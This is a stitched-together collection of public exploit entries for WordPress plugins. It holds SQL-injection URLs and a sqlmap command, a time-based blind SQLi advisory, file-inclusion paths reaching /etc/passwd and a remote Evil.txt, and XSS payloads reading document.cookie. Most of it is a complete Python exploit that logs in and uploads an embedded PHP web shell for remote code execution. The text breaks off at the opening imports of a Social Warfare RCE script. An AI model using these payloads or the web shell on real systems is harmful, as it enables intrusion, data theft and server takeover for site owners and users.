# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com
# Vulnerable Code:
$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?
...
$where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR
LOWER(firstname) LIKE '%{$w}%' OR
LOWER(department) LIKE '%{$w}%' OR
LOWER(email) LIKE '%{$w}%'" : "");
# Vulnerable URL
http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]
# POC
```
sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'
--cookie="wordpress_cookies_paste_here"
```
# POC Image
https://prnt.sc/AECcFRHhe2ib
source: https://www.securityfocus.com/bid/58976/info
Spiffy XSPF Player plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Spiffy XSPF Player 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/spiffy/playlist.php?playlist_id=[SQL]
source: https://www.securityfocus.com/bid/59021/info
Spider Video Player plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Spider Video Player 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL]
source: https://www.securityfocus.com/bid/69675/info
Spider Facebook plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Spider Facebook 1.0.8 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 and 1=2
=============================================
MGC ALERT 2017-003
- Original release date: April 06, 2017
- Last revised: April 10, 2017
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
I. VULNERABILITY
-------------------------
WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection
II. BACKGROUND
-------------------------
WordPress event calendar is a FREE user-friendly responsive plugin to
manage multiple recurring events and with various options.
III. DESCRIPTION
-------------------------
This bug was found using the portal in the files:
/spider-event-calendar/calendar_functions.php: if
(isset($_POST['order_by'])) {
/spider-event-calendar/widget_Theme_functions.php: if
(isset($_POST['order_by']) && $_POST['order_by'] != '') {
And when the query is executed, the parameter "order_by" it is not
sanitized:
/spider-event-calendar/front_end/frontend_functions.php: $rows =
$wpdb->get_results($query." ".$order_by);
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.
It is possible to inject SQL code.
IV. PROOF OF CONCEPT
-------------------------
The following URL have been confirmed to all suffer from Time Based SQL
Injection.
Time Based SQL Injection POC:
POST /wordpress/wp-admin/admin.php?page=SpiderCalendar HTTP/1.1
search_events_by_title=&page_number=1&serch_or_not=&nonce_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar&id_for_playlist=&asc_or_desc=1&order_by=id%2c(select*from(select(sleep(2)))a)
(2 seconds of response)
search_events_by_title=&page_number=1&serch_or_not=&nonce_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar&id_for_playlist=&asc_or_desc=1&order_by=id%2c(select*from(select(sleep(30)))a)
(30 seconds of response)
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
VI. SYSTEMS AFFECTED
-------------------------
Spider Event Calendar <= 1.5.51
VII. SOLUTION
-------------------------
Vendor release a new version.
https://downloads.wordpress.org/plugin/spider-event-calendar.1.5.52.zip
VIII. REFERENCES
-------------------------
https://es.wordpress.org/plugins/spider-event-calendar/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
April 06, 2017 1: Initial release
April 10, 2017 2: Revision to send to lists
XI. DISCLOSURE TIMELINE
-------------------------
April 06, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
April 06, 2017 2: Send to vendor
April 07, 2017 3: Vendor fix the vulnerability and release a new version
April 10, 2017 4: Send to the Full-Disclosure lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
source: https://www.securityfocus.com/bid/47317/info
The Spellchecker plugin for WordPress is prone to a local file-include vulnerability and a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
Spellchecker 3.1 is vulnerable; other versions may also be affected.
The following example URIs are available:
http://www.example.com/general.php?file=http://sitename.com/Evil.txt?
http://www.example.com/general.php?file=../../../../../../../etc/passwd
# Exploit Title: Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)
# Date 07.07.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://smartypantsplugins.com/
# Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.4.21.zip
# Version: Before 4.22
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24347
# CWE: CWE-434
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24347/README.md
'''
Description:
The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files, however,
the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded
by checking the file extension. It was discovered that php files could still be uploaded by
changing the file extension's case, for example, from "php" to "pHP".
'''
'''
Banner:
'''
banner = """
______ _______ ____ ___ ____ _ ____ _ _ _____ _ _ _____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || ||___ /| || |___ |
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_ |_ \| || |_ / /
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _|__) |__ _/ /
\____| \_/ |_____| |_____|\___/_____|_| |_____| |_||____/ |_|/_/
* Wordpress Plugin SP Project & Document Manager < 4.22 - RCE (Authenticated)
* @Hacker5preme
"""
print(banner)
'''
Import required modules:
'''
import requests
import argparse
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin SP Project & Document Manager < 4.22 - RCE (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('')
print('[*] Starting Exploit:')
print('')
'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
# Authenticate:
print('')
auth = session.post(auth_url, headers=header, data=body)
auth_header = auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
print('[+] Authentication successfull !')
else:
print('[-] Authentication failed !')
exit()
'''
Retrieve User ID from the widget:
'''
user_id_text = session.get('http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=sp-client-document-manager-fileview').text
search_string = "<form><select name='user_uid' id='user_uid' class=''>"
user_string = ">" + username
user_id_text = user_id_text[user_id_text.find(search_string):]
user_id_text = user_id_text[user_id_text.find(user_string) - 2: user_id_text.find(user_string)]
user_id = user_id_text.replace("'", '')
'''
Exploit:
'''
exploit_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=sp-client-document-manager-fileview&id=' + user_id
# Header (Exploit):
Header = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Referer": exploit_url,
"Content-Type": "multipart/form-data; boundary=---------------------------37032792112149247252673711332",
"Origin": "http://" + target_ip,
"Connection": "close",
"Upgrade-Insecure-Requests": "1"
}
# Web Shell payload (p0wny shell): https://github.com/flozz/p0wny-shell
shell_payload = "-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"cdm_upload_file_field\"\r\n\r\na1b3bac1bc\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"_wp_http_referer\"\r\n\r\n/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-name\"\r\n\r\nExploits\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"shell.pHP\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"dlg-upload-notes\"\r\n\r\n\r\n-----------------------------37032792112149247252673711332\r\nContent-Disposition: form-data; name=\"sp-cdm-community-upload\"\r\n\r\nUpload\r\n-----------------------------37032792112149247252673711332--\r\n"
# Exploit:
session.post(exploit_url, headers=header, data=shell_payload)
print('')
print('[+] Exploit done !')
print(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/sp-client-document-manager/' + user_id + '/shell.php')
print('')
# Exploit Title: WordPress SP Project & Document Manager 2.5.3 Blind SQL Injection
# Google Dork: inurl:wp-content/plugins/sp-client-document-manager
# Date: 2015-03-04
# Exploit Author: catsecurity
# Vendor Homepage: http://smartypantsplugins.com
# Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.2.5.3.zip
# Version: version 2.5.3 and previous version
# Tested on: Chrome (It's PHP Application)
# CVE : N/A
# Timeline #
[2015.03.05] Reported to the Vendor
[2015.03.06?] Fixed in Update 2.5.4
# Details #
- This vulnerability did not process integer parameters. Unauthorized users can attact the webstites that use this plugin.
- Vulnerability code in the thumbnails() function which exists in the [ /wp-content/plugins/sp-client-document-manager/ajax.php ].
- "pid" variable is not sanitized
# Vulnerable code #
Line 1132: echo '<div id="dlg_cdm_thumbnails">';
Line 1133: if ($_GET['pid'] != "") {
Line 1134: $r_current_project = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu_project WHERE id = " . $_GET['pid'] . "", ARRAY_A);
Line 1135: }
# POC #
/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=[SQLi]
example:
/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=if(substr(database(),1,1)=0x61,sleep(5),1)
if yes it will sleep 5 seconds.
This vulnerable parameters must trance to integer
source: https://www.securityfocus.com/bid/53537/info
The Soundcloud Is Gold plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Soundcloud Is Gold 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-admin/admin-ajax.php
POSTDATA: action=soundcloud_is_gold_player_preview&request=1&width="></iframe><script>alert(1)</script>
# Exploit Title: Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting
# Google Dork: inurl:"\wp-content\plugins\soliloquy-lite"
# Date: 2019-06-13
# Exploit Author: Unk9vvN
# Vendor Homepage: https://soliloquywp.com/
# Software Link: https://wordpress.org/plugins/soliloquy-lite/
# Version: 2.5.6
# Tested on: Kali Linux
# CVE: N/A
# Description
# This vulnerability is in the validation mode and is located in the Prevew of new post inside soliloquy and the vulnerability type is stored ,it happend when a user insert script tag in title input then save the post. everything will be ok until target click on preview of vulnerabil.
1.Go to the 'Add new' section of soliloquy
2.Enter the payload in the "add Title"
3.Select a sample image
4.Click the "Publish" option
5.Click on Preview
6.Your payload will run
# URI: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit
# Parameter & Payoad: post_title=/"><script>alert("Unk9vvN")</script>
#
# POC
#
POST /wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit
Content-Type: application/x-www-form-urlencoded
Content-Length: 1599
Cookie: .......
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
_wpnonce=d9f78b76e2&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=soliloquy&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&post_ID=50&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvN%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&_soliloquy%5Btype%5D=default&async-upload=&post_id=50&soliloquy=bdfd10296c&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&_soliloquy%5Btype_default%5D=1&_soliloquy%5Bslider_theme%5D=base&_soliloquy%5Bslider_width%5D=960&_soliloquy%5Bslider_height%5D=300&_soliloquy%5Btransition%5D=fade&_soliloquy%5Bduration%5D=5000&_soliloquy%5Bspeed%5D=400&_soliloquy%5Bgutter%5D=20&_soliloquy%5Bslider%5D=1&_soliloquy%5Baria_live%5D=polite&_soliloquy%5Btitle%5D=%2F%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&_soliloquy%5Bslug%5D=scriptalert1script&_soliloquy%5Bclasses%5D=&wp-preview=dopreview&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=21&ss=21&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=21&cur_mn=21&original_publish=Update
source: https://www.securityfocus.com/bid/46902/info
Sodahead Polls is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Sodahead Polls 2.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/sodahead-polls/poll.php?customize=%27;%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/sodahead-polls/customizer.php?poll_id=%27%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
source: https://www.securityfocus.com/bid/54320/info
SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
SocialFit 1.2.2 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%28123%29%3C/script%3E
# Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 )
# Date: March, 2019
# Researcher: Luka Sikic
# Exploit Author: hash3liZer
# Download Link: https://wordpress.org/plugins/social-warfare/
# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
# Github: https://github.com/hash3liZer/CVE-2019-9978
# Version: <=3D 3.5.2
# CVE: CVE-2019-9978
# Title: RCE in Social Warfare Plugin Wordpress ( <=3.5.2 )
# Date: March, 2019
# Researcher: Luka Sikic
# Exploit Author: hash3liZer
# Download Link: https://wordpress.org/plugins/social-warfare/
# Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
# Github: https://github.com/hash3liZer/CVE-2019-9978
# Version: <= 3.5.2
# CVE: CVE-2019-9978
import sys
import requests
import re
import urlparse
import optparse
